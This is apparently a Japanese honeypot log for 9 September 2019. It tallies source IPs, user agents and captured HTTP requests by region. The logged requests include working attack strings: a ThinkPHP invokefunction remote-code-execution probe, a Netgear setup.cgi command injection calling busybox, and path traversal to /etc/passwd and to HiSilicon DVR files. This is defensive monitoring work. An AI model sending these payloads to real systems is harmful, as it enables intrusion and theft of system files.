ハニーポット(仮) 観測記録 2019/09/09分です。
特徴
Region:AP
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
zgrabによるスキャン行為
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
5[.]188[.]210[.]101に関する不正通信
を確認しました。
他
アクセス数推移
AP:総アクセス数:47 (前日比:-1)
US:総アクセス数:139 (前日比:+7)
EU:総アクセス数:15 (前日比:-5)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 103.23.42.207 | Bangladesh |
1 | 103.81.139.38 | India |
2 | 103.86.43.71 | India |
4 | 106.13.115.247 | China |
6 | 110.249.212.46 | China |
1 | 113.190.147.227 | Vietnam |
2 | 138.68.208.7 | United States |
1 | 14.169.231.91 | Vietnam |
2 | 159.203.199.119 | United States |
1 | 159.203.199.27 | United States |
1 | 159.203.203.45 | United States |
1 | 168.227.56.70 | Brazil |
1 | 187.188.129.59 | Mexico |
1 | 190.92.58.91 | Honduras |
1 | 193.188.22.56 | Russia |
1 | 203.45.32.34 | Australia |
1 | 213.165.179.62 | Malta |
4 | 52.82.51.105 | China |
1 | 66.249.73.199 | United States |
1 | 74.12.95.231 | Canada |
1 | 82.127.237.205 | France |
2 | 83.143.86.62 | Norway |
1 | 89.183.101.103 | Germany |
5 | 89.248.174.219 | Netherlands |
1 | 95.172.58.22 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
25 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
8 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /admin.php | HTTP/1.1 |
6 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
5 | GET | /lang/en/html/index.html | HTTP/1.1 |
1 | GET | /Lists/admin.php | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
3 | GET | /manager/text/list | HTTP/1.1 |
13 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | \x03 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
6 | 103.105.196.2 | Indonesia |
1 | 116.107.171.53 | Vietnam |
1 | 131.100.47.32 | Brazil |
1 | 138.68.208.23 | United States |
1 | 159.203.203.48 | United States |
101 | 167.71.117.61 | United States |
1 | 171.103.53.22 | Thailand |
1 | 177.130.193.133 | Brazil |
4 | 177.235.237.136 | Brazil |
1 | 187.181.147.220 | Brazil |
4 | 187.181.21.49 | Brazil |
1 | 187.188.211.196 | Mexico |
1 | 187.191.62.8 | Mexico |
1 | 195.208.137.35 | Russia |
1 | 213.49.174.24 | Belgium |
1 | 219.92.69.110 | Malaysia |
1 | 60.13.157.219 | China |
3 | 77.139.214.46 | Israel |
1 | 82.76.133.229 | Romania |
2 | 83.143.86.62 | Norway |
1 | 83.99.234.226 | Latvia |
4 | 89.248.174.219 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
25 | - |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /admin.php | HTTP/1.1 |
1 | GET | ../../etc/passwd | HTTP/1.1 |
2 | GET | /lang/en/html/index.html | HTTP/1.1 |
1 | GET | /Lists/admin.php | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
21 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP/1.1 |
2 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 159.203.199.97 | United States |
1 | 159.203.203.89 | United States |
1 | 193.188.22.56 | Russia |
10 | 39.135.1.156 | China |
1 | 5.188.210.101 | Russia |
1 | 89.248.174.219 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /lang/en/html/index.html | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \x03 |